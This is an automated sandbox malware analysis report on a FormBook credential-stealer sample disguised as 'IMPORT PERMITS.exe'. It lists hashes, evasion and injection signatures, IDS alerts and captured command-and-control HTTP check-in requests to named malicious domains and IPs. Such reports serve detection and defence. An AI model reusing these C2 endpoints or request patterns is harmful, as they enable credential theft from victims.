Windows Analysis Report
IMPORT PERMITS.exe

Overview

General Information

Sample name: IMPORT PERMITS.exe
Analysis ID: 1547340
MD5: b648db78eac01c6c7311e34d232b4ed7
SHA1: 3efe3363ea8f532301252ac23c0b0df116836e67
SHA256: 1eef3c00ea6fe6b3e757e7ee213f2cf19a76cb290ceb108b5dc63fe7eb86012c
Tags: exe, Formbook, user-threatcat_ch

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • IMPORT PERMITS.exe (PID: 6572 cmdline: "C:\Users\user\Desktop\IMPORT PERMITS.exe" MD5: B648DB78EAC01C6C7311E34D232B4ED7)
    • IMPORT PERMITS.exe (PID: 2032 cmdline: "C:\Users\user\Desktop\IMPORT PERMITS.exe" MD5: B648DB78EAC01C6C7311E34D232B4ED7)
      • gKZXbGXeVZyo.exe (PID: 4020 cmdline: "C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • PATHPING.EXE (PID: 5844 cmdline: "C:\Windows\SysWOW64\PATHPING.EXE" MD5: 078AD26F906EF2AC1661FCAC84084256)
          • gKZXbGXeVZyo.exe (PID: 3512 cmdline: "C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 2364 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000007.00000002.4121846462.0000000002A10000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000002.00000002.2056520278.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000007.00000002.4120631323.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000007.00000002.4121706840.00000000008C0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000002.00000002.2058360059.0000000001750000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
2.2.IMPORT PERMITS.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
2.2.IMPORT PERMITS.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

No Sigma rule has matched

                AV Detection

                Source: IMPORT PERMITS.exe, ReversingLabs: Detection: 68%
                Source: IMPORT PERMITS.exe, Virustotal: Detection: 55%
                Source: Yara match, File source: 2.2.IMPORT PERMITS.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 2.2.IMPORT PERMITS.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 00000007.00000002.4121846462.0000000002A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000002.00000002.2056520278.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000007.00000002.4120631323.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000007.00000002.4121706840.00000000008C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000002.00000002.2058360059.0000000001750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000008.00000002.4123927554.00000000057E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000006.00000002.4121787054.0000000004A50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000002.00000002.2058495171.00000000035D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
                Source: IMPORT PERMITS.exe, Joe Sandbox ML: detected
                Source: IMPORT PERMITS.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: IMPORT PERMITS.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: GPUK.pdbSHA256 source: IMPORT PERMITS.exe
                Source: Binary string: pathping.pdb source: IMPORT PERMITS.exe, 00000002.00000002.2056786329.0000000000E88000.00000004.00000020.00020000.00000000.sdmp, gKZXbGXeVZyo.exe, 00000006.00000002.4121260219.0000000000F28000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: gKZXbGXeVZyo.exe, 00000006.00000000.1970482596.000000000071E000.00000002.00000001.01000000.0000000C.sdmp, gKZXbGXeVZyo.exe, 00000008.00000000.2122498147.000000000071E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: pathping.pdbGCTL source: IMPORT PERMITS.exe, 00000002.00000002.2056786329.0000000000E88000.00000004.00000020.00020000.00000000.sdmp, gKZXbGXeVZyo.exe, 00000006.00000002.4121260219.0000000000F28000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: IMPORT PERMITS.exe, 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000003.2056921081.0000000002944000.00000004.00000020.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000003.2059145446.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000002.4122030523.0000000002CA0000.00000040.00001000.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000002.4122030523.0000000002E3E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: IMPORT PERMITS.exe, IMPORT PERMITS.exe, 00000002.00000002.2056962870.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, PATHPING.EXE, PATHPING.EXE, 00000007.00000003.2056921081.0000000002944000.00000004.00000020.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000003.2059145446.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000002.4122030523.0000000002CA0000.00000040.00001000.00020000.00000000.sdmp, PATHPING.EXE, 00000007.00000002.4122030523.0000000002E3E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: GPUK.pdb source: IMPORT PERMITS.exe
                Source: C:\Windows\SysWOW64\PATHPING.EXE, Code function: 7_2_0041C160 FindFirstFileW,FindNextFileW,FindClose [7_2_0041C160]
                Source: C:\Windows\SysWOW64\PATHPING.EXE, Code function: 4x nop then xor eax, eax [7_2_00409DD0]
                Source: C:\Windows\SysWOW64\PATHPING.EXE, Code function: 4x nop then mov ebx, 00000004h [7_2_02B004DE]

                Networking

                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:65458 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:65458 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:65495 -> 172.67.131.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:65510 -> 172.67.131.32:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49155 -> 172.67.131.32:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49155 -> 172.67.131.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49191 -> 103.191.208.137:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49207 -> 103.191.208.137:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49236 -> 103.191.208.137:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49221 -> 103.191.208.137:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49236 -> 103.191.208.137:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:65522 -> 172.67.131.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49320 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49333 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49352 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49352 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49357 -> 38.47.232.160:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49353 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49365 -> 162.0.211.143:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49381 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49354 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49366 -> 162.0.211.143:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49361 -> 34.92.109.131:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49382 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49343 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49368 -> 162.0.211.143:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49359 -> 38.47.232.160:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49355 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49360 -> 38.47.232.160:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49369 -> 195.110.124.133:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49360 -> 38.47.232.160:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49386 -> 103.233.82.58:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49368 -> 162.0.211.143:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49363 -> 34.92.109.131:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49364 -> 34.92.109.131:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49364 -> 34.92.109.131:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49371 -> 195.110.124.133:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49376 -> 185.68.16.94:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49376 -> 185.68.16.94:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49367 -> 162.0.211.143:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49375 -> 185.68.16.94:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49358 -> 38.47.232.160:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49378 -> 163.44.176.12:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49372 -> 195.110.124.133:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49372 -> 195.110.124.133:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49388 -> 103.233.82.58:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49388 -> 103.233.82.58:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49379 -> 163.44.176.12:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49385 -> 103.233.82.58:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49384 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49384 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49356 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49356 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49374 -> 185.68.16.94:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49387 -> 103.233.82.58:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49373 -> 185.68.16.94:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49370 -> 195.110.124.133:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49377 -> 163.44.176.12:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49362 -> 34.92.109.131:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49380 -> 163.44.176.12:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49380 -> 163.44.176.12:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49383 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49389 -> 216.219.93.17:80
                Source: DNS query: www.deepfy.xyz
                Source: DNS query: www.cmdh1c.xyz
                Source: Joe Sandbox View, IP Address: 195.110.124.133
                Source: Joe Sandbox View, ASN Name: INTERQGMOInternetIncJP
                Source: Joe Sandbox View, ASN Name: CLOUDFLARENETUS
                Source: Joe Sandbox View, ASN Name: COGENT-174US
                Source: Joe Sandbox View, ASN Name: REGISTER-ASIT
                Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.4:65456
                Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.4:49735
                Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.4:65457
                Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /a1y9/?SJuP9=UPQLWRgHAD_&Z0WTZ=iZz4I3W5iLJGfbtGmZ2CObwfByBiroJddzdGuVUGr5fdVP/mU/ghPDmzUyOVJzAbJgU0ueO9BFeqSkyyfz76yiSG65EDj9rJsjZ/uDCtsUVT8Sp7eRbdwLE= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.litsgs.vipConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                Source: global trafficHTTP traffic detected: GET /c2q3/?Z0WTZ=j/0mpNm2Bsp7DIZ0lL93uSEy3O7+v2qbjKVTngZW+fxoFlp5b+1ximLQJstL0djCplBlCo8niZKHcOIqzu0BFGSn0M5MS0dRMByh0HJ4/jaoTuMehM4oDS0=&SJuP9=UPQLWRgHAD_ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.7wkto5nk230724z.clickConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                Source: global trafficHTTP traffic detected: GET /w5is/?Z0WTZ=HbCgM9YcBMttwdZrXhLlY5z1HFkNRQK7DIvCaf9ftWyGunbQ91oOdhxta7T/vCia7UhAH45R/qaSwn7axWhs9/xB9a8/qr3Kz4jMxTKXhFTKb3+4TwbOFdg=&SJuP9=UPQLWRgHAD_ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.roopiedutech.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                Source: global trafficHTTP traffic detected: GET /mgme/?Z0WTZ=3lL/hypx1hmyWKcZLPPjI3y0DWzdh1Mqom9U/1xhTPLquFXOEtCOjeGYhH0PH+auVNiYKnzM9W/uk3mi7YblJuOSg3EBIys+/hhk110xaMRzC++YecO4bSA=&SJuP9=UPQLWRgHAD_ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.suree.betConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                Source: global trafficHTTP traffic detected: GET /4q66/?Z0WTZ=luPP4oyA+IxXa4dPaQ44uTX+yoj5Av033QMPVNIFYKC2UntJdFHOXwWAX/7zhXjIXLYqvWecISwtUHhz1+aJwbK46q/K1DU8OrPrV+gFHYeA3Gw8r5+flHs=&SJuP9=UPQLWRgHAD_ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.bocadolobopetra.netConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                Source: global trafficHTTP traffic detected: GET /wh1i/?Z0WTZ=NfOB86VXI4wsVz/XO9ACyDnBWrbPRq/QJ2w3Rs+6xYlcxVFOr5mbmHJ2iOb+4RiHynZrudFNXkx38yGLhxQe11Zee6oqKWgky3dD2swdesJmFdrAGLP7kwM=&SJuP9=UPQLWRgHAD_ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.44kdd.topConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                Source: global trafficHTTP traffic detected: GET /qgza/?Z0WTZ=qUfac4sEgcT1lV7He6HHqRuPwSXpeUZhJqCALOrqisMgJsMY6XUJFSDaK0uTR8zfEfRb7N0j/DnowCq79bdHl1fL6DN9OJHq4gCFNVkq5WVy1qGx7uu1RVo=&SJuP9=UPQLWRgHAD_ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.dbasky.netConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                Source: global trafficHTTP traffic detected: GET /icpx/?Z0WTZ=EWEf4eOOpXzvErl7RdF5qy2I3vzfoFn6qWFMKyXoxLDqmpyGz4laiprjdpsB5hfyQE5UJ9beIy4J0yBeSjcOCjXGgmEr9dkECjGb/w9fv9zko2b6bEiJ13U=&SJuP9=UPQLWRgHAD_ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.zoptra.infoConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                Source: global trafficHTTP traffic detected: GET /uhg3/?Z0WTZ=BYkW8sJ9y3cOHNEoRxCwA5Vo4ahPFjBVLPr9x2y6ZT42IcqGpiutRD9HR4qSfel6nhfbupoEu3BM2yJdNDd6onHQNeQ4qPh2tk8usD30jryO8epkJ7XZGNI=&SJuP9=UPQLWRgHAD_ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.nutrigenfit.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                Source: global trafficHTTP traffic detected: GET /pjcb/?SJuP9=UPQLWRgHAD_&Z0WTZ=mR41NwlPpWSeNv3ogRNiaiaxYZXyC1SkAJjbD/qSc2ukVSLu6jyn16P/AoWnmXjc847+20hqOz4nW3sR+UY1qAEpIZA0h6plj49hN8QYEBC/SES4lZybD8k= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.redex.funConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                Source: global trafficHTTP traffic detected: GET /51fd/?Z0WTZ=5XThc+sTNfSc1dyVCHius6QJlgyE7UD3g9QPrW9D0ZCA6InRQfgmSS7sY3ZsEANqCFm0SxAy1XScT67z0IieRfxf0Cr6BzHBArQcGKRuou4FU1nhplefNR0=&SJuP9=UPQLWRgHAD_ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.broork.sbsConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                Source: global trafficHTTP traffic detected: GET /t7p4/?SJuP9=UPQLWRgHAD_&Z0WTZ=l9a7eDheKRZy9bhcTeCHdToYa6mt3ij4C0pbULzToM8sx4gmKc4u2ZHXAvhfaYH7/T0zUvL9+kkqYwdWGnSBKq2rvPWRIuzqlymkkYj2zkimPtA3jZhNuM4= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.deepfy.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                Source: global trafficHTTP traffic detected: GET /6byd/?Z0WTZ=cJlBP4gdQg33LxRaxIBB9TpDVwunrRcR6TPzX8fihpDKfN+C3z32iLCDUP2OAgtSF65Fjxsz3xegGgg43kjMMLGB+pU0EQVXDohFVmD6n/q0/xsVCvDFB+8=&SJuP9=UPQLWRgHAD_ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.cmdh1c.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                Source: global trafficDNS traffic detected: DNS query: 171.39.242.20.in-addr.arpa
                Source: global trafficDNS traffic detected: DNS query: www.litsgs.vip
